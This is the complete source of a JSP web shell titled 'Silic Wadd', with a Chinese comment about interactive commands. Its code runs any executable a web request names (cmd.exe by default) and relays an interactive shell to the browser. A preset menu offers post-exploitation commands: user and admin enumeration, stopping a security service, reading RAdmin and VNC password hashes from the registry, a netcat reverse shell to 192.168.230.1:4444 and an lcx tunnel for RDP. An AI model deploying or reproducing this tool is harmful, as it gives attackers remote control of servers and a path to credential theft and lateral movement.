很多命令需要交互式完成
<%@page pageEncoding="gbk"%> <%@page import="java.io.*"%> <%! public static boolean isEmpty(String s) { return s == null || s.trim().length() == 0; } public static String convert(String s) throws Exception { if (isEmpty(s)) return ""; return new String(s.getBytes("iso-8859-1")); } static String cmd = "first"; static Process pro = null; class StreamConnector extends Thread { private InputStream is; private OutputStream os; private String name; public StreamConnector( InputStream is, OutputStream os ,String name){ this.is = is; this.os = os; this.name = name; } public void run(){ BufferedReader in = null; BufferedWriter out = null; try{ in = new BufferedReader( new InputStreamReader(this.is)); out = new BufferedWriter( new OutputStreamWriter(this.os)); char buffer[] = new char[128]; if(this.name.equals("exeRclientO")) { //从EXE读向客户端写 int length = 0; while((length = in.read( buffer, 0, buffer.length ))>0){ String str = new String(buffer, 0, length); str = str.replace("&","&").replace("<","<").replace(">",">"); str = str.replace(""+(char)13+(char)10,"<br/>"); str = str.replace("\n","<br/>"); out.write(str.toCharArray(), 0, str.length()); out.flush(); } } else { //从客户端读向EXE写。 while(true) { while(cmd == null) { Thread.sleep(500); } if (cmd.equals("first")) { cmd = null; continue; } cmd = cmd + (char)10; char[] arr = cmd.toCharArray(); out.write(arr,0,arr.length); out.flush(); cmd = null; } } } catch(Exception e){ } try{ if(in != null) in.close(); if(out != null) out.close(); } catch( Exception e ){ } } } %> <% String o = request.getParameter("o"); if (isEmpty(o)) o = "index"; else o = o.trim().toLowerCase(); if (o.equals("index")) { %> <html> <head> <title>Silic Wadd</title> <style type="text/css"> body{margin:0px;padding:10px;font: 12px Arial,Tahoma;line-height: 16px;} .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;} .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;} .tip{color:red;font-weight:bold;} hr{border: 1px solid rgb(221, 221, 221); height: 0px;} .secho{height:75%;width:100%;overflow:auto;border:none} </style> <script> function $(id) { return document.getElementById(id); } var ie = window.navigator.userAgent.toLowerCase().indexOf("msie") != -1; window.onload = function(){ setInterval(function(){ if ($("autoscroll").checked) { var f = window.frames["echo"]; if (f && f.document && f.document.body) { if (!ie) { if (f.document.body.offsetHeight) { f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1); } } else { f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1); } } } },500); } </script> </head> <body> <form action="" method="post" target="echo" onsubmit="$('cmd').focus()"> <input type="submit" value=" 开始交互 " class="bt"> <input type="text" name="exe" style="width:300px" class="input" value="c:\windows\system32\cmd.exe"/> <input type="hidden" name="o" value="start"/><span class="tip">IE交互后需要先执行命令才能看到回显</span> </form> <hr/> <iframe class="secho" name="echo" src=""> </iframe> <form action="" method="post" onsubmit="this.submit();$('cmd').value='';return false;" target="asyn"> <input type="text" id="cmd" name="cmd" class="input" style="width:80%"> <input name="o" id="o" type="hidden" value="execute"/> <select onchange="$('cmd').value = this.value;$('cmd').focus()"> <option value="" selected> </option> <option value="set">set</option> <option value="netstat -an">netstat -an</option> <option value="net user">net user</option> <option value="tasklist">tasklist</option> <option value="tasklist /svc">tasklist /svc</option> <option value="net start">net start</option> <option value="net stop policyagent /yes">net stop</option> <option value="nbtstat -A IP">nbtstat -A</option> <option value='reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber"'>reg query</option> <option value='reg query "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\" /v "Parameter"'>radmin hash</option> <option value='reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4" /v "password"'>vnc hash</option> <option value="nc -e cmd.exe 192.168.230.1 4444">nc</option> <option value="lcx -slave 192.168.230.1 4444 127.0.0.1 3389">lcx</option> <option value="systeminfo">systeminfo</option> <option value="net localgroup">view groups</option> <option value="net localgroup administrators">view admins</option> </select> <input type="checkbox" checked="checked" id="autoscroll">自动滚屏 <input type="button" value="断开" class="bt" onclick="$('o').value='stop';this.form.submit()"> </form> <hr/> <iframe style="display:none" name="asyn"/> </body> </html> <% } else if (o.equals("start")) { String exe = request.getParameter("exe"); if (!isEmpty(exe)) { pro = Runtime.getRuntime().exec(exe); ByteArrayOutputStream outs = new ByteArrayOutputStream(); response.setContentLength(100000000); new StreamConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR").start(); new StreamConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO").start(); new StreamConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO").start();//错误信息流。 Thread.sleep(1000 * 60 * 60 * 24); } } else if (o.equals("execute")) { String command = request.getParameter("cmd"); if (!isEmpty(command)) { cmd = convert(command); } } else if (o.equals("stop")) { pro.destroy(); } %>